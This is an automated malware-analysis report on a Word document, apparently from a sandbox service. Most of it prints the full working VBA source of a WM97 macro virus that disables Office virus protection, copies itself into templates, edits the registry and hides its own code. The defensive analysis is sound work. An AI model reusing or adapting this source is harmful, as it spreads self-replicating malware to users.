Verdict: MALICIOUS
Risk Score: 248
MITRE ATT&CK: T1059.005 Visual Basic

Malware Insights
This document exhibits characteristics of a legacy macro-virus, specifically identified as Win.Trojan.Pivis-2 by ClamAV. The presence of Auto_Close and Auto_Open macros, along with legacy WordBasic markers, indicates an attempt to execute malicious code upon opening or closing the document. The VBA script attempts to disable macro security features and modify system settings, likely to facilitate further malicious activity or persistence.
Heuristics (5)

- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `.VirusProtection = False`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `Sub AutoClose()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5926 bytes |

- SHA-256: 2186802608917d420067bd8a61c4a49ea1e8c4498fb24eb05af80a0d577bd06b
- Detection (ClamAV): Doc.Trojan.Agnes-2
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "RonaldLok"
Sub VjFxJx5031()
' -= [LineZerO's Macro Engine 1.2] =-
' -= [WM97.RonaldLok] =-
' -= [ID: 17063-Vk-16825031-Ls.W] =-
On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
'This code is taken from Pyro | Thanks
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("RonaldLok").CodeModule.ProcCountLines("VjFxJx5031", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("RonaldLok").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeCaption") = "HELLO !"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeText") = "HELLO ! RONALD LOK !"
Call DzNvJy4461
End Sub
Sub DzNvJy4461()
On Error Resume Next
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
End Sub
Sub Vk1682()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("RonaldLok").Export "C:\RonaldLok.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.RonaldLok" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 17063-Vk-16825031-Ls.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "RonaldLok" Then PjDeAy5889MjTtUm1682 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "RonaldLok" Then OpHuNx4461VjFxJx5031 = True
Next y
If PjDeAy5889MjTtUm1682 = True And OpHuNx4461VjFxJx5031 = False Then Set ArVrGw8470DzNvJy7074 = ActiveDocument.VBProject
If PjDeAy5889MjTtUm1682 = False And OpHuNx4461VjFxJx5031 = True Then Set ArVrGw8470DzNvJy7074 = NormalTemplate.VBProject
If PjDeAy5889MjTtUm1682 = True And OpHuNx4461VjFxJx5031 = True Then GoTo Ende_
ArVrGw8470DzNvJy7074.VBComponents.Import "C:\RonaldLok.sys"
If OpHuNx4461VjFxJx5031 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If PjDeAy5889MjTtUm1682 = False Then NormalTemplate.Save
Ende_:
Call VjFxJx5031
End Sub
Sub AutoClose()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
End Sub
Sub AutoExit()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
End Sub
Sub AutoNew()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
End Sub
Sub AutoExec()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
End Sub
Sub DateiNeu()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call Vk1682
Call VjFxJx5031
End Sub
Sub DateiOffnen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Call Vk1682
Call VjFxJx5031
End Sub
Sub DateiSchliesen()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
WordBasic.FileClose dlg
End Sub
Sub DateiSpeichern()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
ActiveDocument.Save
End Sub
Sub DateiSpeichernUnter()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub DateiDrucken()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
Dialogs(wdDialogFilePrint).Show
End Sub
Sub BearbeitenErsetzen()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
Dialogs(wdDialogEditReplace).Show
End Sub
Sub ExtrasRechtschreibung()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
If Options.CheckGrammarWithSpelling = True Then
ActiveDocument.CheckGrammar
Else
ActiveDocument.CheckSpelling
End If
End Sub
Sub ExtrasSilbentrennung()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
Dialogs(wdDialogsToolsHyphenation).Show
End Sub
Sub ExtrasOptionen()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
Dialogs(wdDialogToolsOptions).Show
End Sub
Sub ViewCode()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
MsgBox "Nicht genug Speicher um Anwendung auszufuhren", 16, "Microsoft Word"
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
MsgBox "Nicht genug Speicher um Anwendung auszufuhren", 16, "Microsoft Word"
End Sub
Sub FileTemplates()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
MsgBox "Nicht genug Speicher um Anwendung auszufuhren", 16, "Microsoft Word"
End Sub
Sub ToolsMacro()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
MsgBox "Nicht genug Speicher um Anwendung auszufuhren", 16, "Microsoft Word"
End Sub
Sub FormatStyle()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
MsgBox "Nicht genug Speicher um Anwendung auszufuhren", 16, "Microsoft Word"
End Sub
```